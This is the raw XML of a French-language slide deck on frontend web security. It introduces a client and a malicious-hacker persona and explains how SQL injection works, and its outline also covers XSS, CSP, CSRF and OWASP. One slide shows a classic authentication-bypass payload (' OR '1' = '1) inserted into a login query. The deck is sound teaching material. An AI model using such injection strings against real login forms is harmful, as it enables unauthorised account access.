                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cliente du site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4390975" y="3854875"/>
            <a:ext cx="3911099" cy="1117799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oscar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker mal intentionné</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Shape 110"/>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="f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4205"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3139350" y="2447925"/>
            <a:ext cx="3152875" cy="3415675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1368675"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>INJECTIONS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 117"/>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Injections SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 123"/>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Comment ça marche ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Shape 124"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325950" y="3383000"/>
            <a:ext cx="8516700" cy="1556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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une injection SQL permet à un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="3200" strike="sngStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>développeur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> utilisateur d’exécuter une requête en base de données</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="Shape 125"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755075" y="967575"/>
            <a:ext cx="2829224" cy="1697524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Shape 126"/>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="f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26994" y="-47090"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Shape 132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126994" y="422135"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400" i="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment ça marche ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Shape 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036050" y="3832475"/>
            <a:ext cx="7071900" cy="1373699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFEF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="3600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>⇒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="3000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT u FROM UTILISATEUR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE pwd = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>AND login = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>' OR '1' = '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="495450" y="1702850"/>
            <a:ext cx="8164949" cy="1526900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Shape 135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6572250"/>
            <a:ext cx="1016099" cy="275100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="fr"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Thème BDX">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6829</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>794</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Dosis</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Thème BDX</vt:lpstr>
      <vt:lpstr>Sécurité Frontend</vt:lpstr>
      <vt:lpstr>Qui sommes nous ?</vt:lpstr>
      <vt:lpstr>Pourquoi parler de sécurité ?</vt:lpstr>
      <vt:lpstr>Safe Browsing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Personas</vt:lpstr>
      <vt:lpstr>INJECTIONS</vt:lpstr>
      <vt:lpstr>Injections SQL</vt:lpstr>
      <vt:lpstr>Injections</vt:lpstr>
      <vt:lpstr>Injections</vt:lpstr>
      <vt:lpstr>Injections</vt:lpstr>
      <vt:lpstr>Injections</vt:lpstr>
      <vt:lpstr>Injections</vt:lpstr>
      <vt:lpstr>Injections</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>CSP</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>CSRF Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Redirection</vt:lpstr>
      <vt:lpstr>Unvalidated Redirects and Forwards</vt:lpstr>
      <vt:lpstr>Redirection invalide</vt:lpstr>
      <vt:lpstr>Unvalidated Redirects and Forwards</vt:lpstr>
      <vt:lpstr>HTTPS</vt:lpstr>
      <vt:lpstr>HTTPS</vt:lpstr>
      <vt:lpstr>Divulgation</vt:lpstr>
      <vt:lpstr>Divulgation des logiciels</vt:lpstr>
      <vt:lpstr>Insecure redirect object reference</vt:lpstr>
      <vt:lpstr>Fonctionnalités accessibles</vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>Scanner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Sécurité Frontend</dc:title>
  <cp:lastModifiedBy>Jérémy Pinsolle</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-12-03T13:51:06Z</dcterms:modified>
</cp:coreProperties>
</file>